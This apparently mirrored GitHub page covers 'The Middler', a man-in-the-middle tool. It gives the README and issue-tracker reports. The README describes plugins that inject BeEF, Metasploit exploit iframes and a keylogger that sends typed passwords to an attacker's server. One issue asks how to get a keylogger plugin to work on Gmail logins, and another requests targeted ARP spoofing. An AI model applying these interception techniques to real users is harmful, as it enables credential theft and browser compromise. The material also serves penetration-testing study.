jaybeale / middler Goto Github PK
View Code? Open in Web Editor NEWAutomatically exported from code.google.com/p/middler
Automatically exported from code.google.com/p/middler
== Introduction == The Middler is a Man in the Middle tool to demonstrate protocol middling attacks. Led by Jay Beale, the project involves a team of authors including InGuardians agents Justin Searle and Matt Carpenter, as well as non-InGuardians Open Sourcers Tim Craig and Brandon Edwards. The Middler is intended to man in the middle, or "middle," for short, every protocol for which we can create code. In our first alpha release, we released an HTTP proxy built by Matt and Jay, with introductory plug-ins by Justin and InGuardians agent Tom Liston. The HTTP proxy and plugins have moved into full production state, with a new protocol, Voice over IP's own SIP, in development. The Middler runs on Linux and OS X and requires Python 2.6.x. == Plug-Ins == Justin and Tom's first plug-ins were very cool: * plugin-beef.py - inject the Browser Exploitation Framework (BeEF) into any HTTP requests originating on the local LAN * plugin-metasploit.py - inject an IFRAME into cleartext (HTTP) requests that loads Metasploit browser exploits * plugin-keylogger.py - inject a JavaScript? onKeyPress event handler to cleartext forms that get submitted via HTTPS, forcing the browser to send the password character-by-character to the attacker's server, before the form is submitted. Justin has refinements to these on the way, as well as a batch of so-far unreleased modules. The author team has done a tremendous amount of research, design and pseudo-code work, fleshing out attacks on web-based e-mail systems and social networking sites. We'll be standing up an external Wiki soon to share more of these ideas, but you can get early details from our slides from Jay and Justin's talks at Def Con. == Dependencies: == The Middler depends on the following Python modules: * scapy * libpcap * readline * libdnet (libdumbnet on some systems where dnet means DECnet.) * python-netfilter Please see the wiki for platform-specific installation instructions. == People: == Justin Searle - Co-Author Matt Carpenter - Co-Author Tom Liston - Emeritus Co-author Tim Craig - Co-author, fixing HTTP issues Brandon Edwards - Co-Author, focus on DHCP Poisoning and Installation/Update Rob Fuller / Mubix - Beta Tester Matt Burton - Beta Tester Lance James - Beta Tester Nick DePetrillo - Beta Tester Brian Aker / Krow - Beta Tester Jay Beale - Co-Author and Project Lead === Special Pre-Announcement: === Justin Searle offers a class on Man in the Middle Attacks for Penetration Testers class, where he teaches people how to both use and add onto the Middler and other MitM tools. We're sure you'll find the class very useful.
What steps will reproduce the problem?
1. Starting middler.py as root and user
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
Revision 169
Ubtunu 9.10
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 12 Dec 2009 at 7:13
What steps will reproduce the problem?
1. Have Middler start proxying some traffic
2. Try to kill middler with a ^C
3. If this doesn't work, you have to kill -9 the process
What is the expected output? What do you see instead?
Middler should gracefully die when you pass it a ^C
Please use labels and text to provide additional information.
I suspect it happens when middler still has threads open
Original issue reported on code.google.com by [email protected]
on 4 Jul 2009 at 11:15
I have noticed middler picking up what it believes to be SIP traffic when
in fact there is no SIP traffic.
Middler throws out the folloing output:
---------START------------------------------------
Started a new thread to handle connection from 192.168.10.2:30788 on port
10000!
Looking at a line that reads
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
First line was
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
��v��[�����������?��LX�?���S�����r-4ǹTh
�qM.��F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9
�f�ME�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��
VF=х��tb��)��e1:t4:�L1:v4:UTH81:y1:re
SIP Method line:
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
Modified headers:
d1:rd2:id20:�S@y&���R��C+ZSO8�n5:nodes208:�SA���!l��>|��p�
���zr�||n����SD�L_Da��
[�����������?��LX�?���S�����r-4ǹTh�qM.���
�F�t�ۭ�S��=�l�z_�j��CGZ�LW���S����0LM���q9�f�ME��
�;�g�S�X^2ޠHR����6k�(�rM[�E��S&����>}��VF=х��tb
��)��e1:t4:�L1:v4:UTH81:y1:re
DEBUG: destination URI is
DEBUG: wasn't in our SIP URI -> IP:Port table.
DEBUG: Parsed destination hostname - it was
------Thread from port 10000 out!----
I have done a quick ngrep here is the output of the traffic its picking up:
usr@endure:~/tools$ sudo ngrep -q -d wlan0 UTH81:
U 192.168.10.2:30788 -> 95.24.41.190:2048
d1:rd2:id20:[email protected]&...R..C+ZSO8.ne1:t4:ly..1:v4:UTH81:y1:re
U 192.168.10.2:30788 -> 95.24.41.190:2048
d1:rd2:id20:[email protected]&...R..C+ZSO8.ne1:t4:ly..1:v4:UTH81:y1:re
U 192.168.10.2:30788 -> 74.219.91.121:41092
d1:rd2:id20:[email protected]&...R..C+ZSO8.n5:nodes208:.SM.............`-..\...R..SNA5...%>.
y{5G..mW^Z...
...SH.F(..'.J..lua0.wo\(Sp< .S]/
<m#.'..Q..^...._8"#...S\V<[email protected].]]...#.S_./.ODHA3.G
,....s.M1..]*.S_./.ODHA3.G,....s.Q8.*2..S_./.ODHA3.G,....s.|zZ.&s5:token20:....8
.3.p'AO..s8..
.c6:valuesl6:...L..6:CVK...6:Ji...D6:B9.]..6:Q.].E.6:...p..6:T.G.].6:F.....ee1:t
4:....1:v4:UT
H81:y1:re
U 192.168.10.2:30788 -> 74.219.91.121:41092
d1:rd2:id20:[email protected]&...R..C+ZSO8.n5:nodes208:.SM.............`-..\...R..SNA5...%>.
y{5G..mW^Z...
...SH.F(..'.J..lua0.wo\(Sp< .S]/
<m#.'..Q..^...._8"#...S\V<[email protected].]]...#.S_./.ODHA3.G
,....s.M1..]*.S_./.ODHA3.G,....s.Q8.*2..S_./.ODHA3.G,....s.|zZ.&s5:token20:....8
.3.p'AO..s8..
.c6:valuesl6:...L..6:CVK...6:Ji...D6:B9.]..6:Q.].E.6:...p..6:T.G.].6:F.....ee1:t
4:....1:v4:UT
H81:y1:re
The host sending this is my partners Mac.
Middler is running on my ubuntu laptop.
Original issue reported on code.google.com by Mr.R.Birtles
on 27 Apr 2010 at 2:37
What steps will reproduce the problem?
1. Start tcpdump on Middler machine
2. Start proxying traffic with Middler
3. Analyze delay between Middler receiving traffic from Inet and sending a
proxied copy to the victim
What is the expected output? What do you see instead?
Middler should send traffic as soon as it receives it
Please use labels and text to provide additional information.
Original issue reported on code.google.com by [email protected]
on 4 Jul 2009 at 11:23
What steps will reproduce the problem?
1. setup.py build
2.
3.
What is the expected output? What do you see instead?
error: package directory 'middlerlib' does not exist
What version of the product are you using? On what operating system?
kali linux
backtrack5r3
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 2 Jul 2013 at 10:18
What steps will reproduce the problem?
1. Start an arpspoof
2. Start Middler
3. go to gmail.com and do a login
What is the expected output? What do you see instead?
My javascript should be injected into the response
What version of the product are you using? On what operating system?
The last revision
Please provide any additional information below.
I'va written a JavaScript based keylogger plugin for Middler (based on your
original keylogger plugin)
It works on most of sites, but in sites that have an initial HTTPS
connection, it fails (It seems that gmail.com returns a "302 Moved
Temporarily" and then redirects to the gmail's main page)
Is there any work on keylogger plugin ?
Should I know something specific about injecting code to sites such as gmail ?
Original issue reported on code.google.com by mehdideveloper
on 2 Aug 2009 at 9:24
Attachments:
What steps will reproduce the problem?
1.
2.
3.
What is the expected output? What do you see instead?
What version of the product are you using? On what operating system?
ubuntu 9.04
Please provide any additional information below.
Original issue reported on code.google.com by [email protected]
on 24 Jul 2009 at 6:15
What steps will reproduce the problem?
1. Checkout latest SVN, run middler
2. Use IE 8
3. Visit Google
What is the expected output? What do you see instead?
I expect to see google, instead I see "you cannot connect"
What version of the product are you using? On what operating system?
IE8 on XPsp3 and Win7
Please provide any additional information below.
There are 2 problems:
1) in http_proxy a pop occurs when gzip is encountered without resetting
index thereby dropping one other element in the header
2) Google seems to be assuming I can handle the gzip data, and passing it
along even though there isn't an encoding method specified in the request
The attached patch fixed it for me.
Thanks,
Ryan
Original issue reported on code.google.com by [email protected]
on 31 Mar 2010 at 6:25
Attachments:
For the arp spoofing flag, could this be extended from just on and off to
use targets, and possibly files. (i.e.
-A (Choose an option, default it 1 - or full ON)
0 OFF, no arp spoofing will be conducted.
1 ON, arp spoofing will happen against the gateway
2 <target> arp spoofing will happen against the specified target
3 <file> targeted arp spoofing will happen against each of the line
separated list of hosts from a file.
Thanks,
mubix
Original issue reported on code.google.com by [email protected]
on 27 Jul 2009 at 3:21
./middler.py
WARNING: No route found for IPv6 destination :: (no default route?)
==================================
The Middler - HTTP and SIP Edition
==================================
Redirecting udp port 5060 to The Middler's proxy on localhost:5060
Redirecting udp port 5061 to The Middler's proxy on localhost:5061
Redirecting udp port 10000 to The Middler's proxy on localhost:10000
Redirecting udp port 64064 to The Middler's proxy on localhost:64064
Redirecting tcp port 80 to The Middler's proxy on localhost:80
Traceback (most recent call last):
File "./middler.py", line 140, in <module>
server = libmiddler.proxies.http.http_proxy.ThreadedTCPServer((ml.hostname,ml.port), libmiddler.proxies.http.http_proxy.Middler_HTTP_Proxy)
File "/usr/lib/python2.6/SocketServer.py", line 400, in __init__
self.server_bind()
File "/usr/lib/python2.6/SocketServer.py", line 411, in server_bind
self.socket.bind(self.server_address)
File "<string>", line 1, in bind
socket.error: [Errno 98] Address already in use
Original issue reported on code.google.com by [email protected]
on 20 May 2013 at 8:41
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.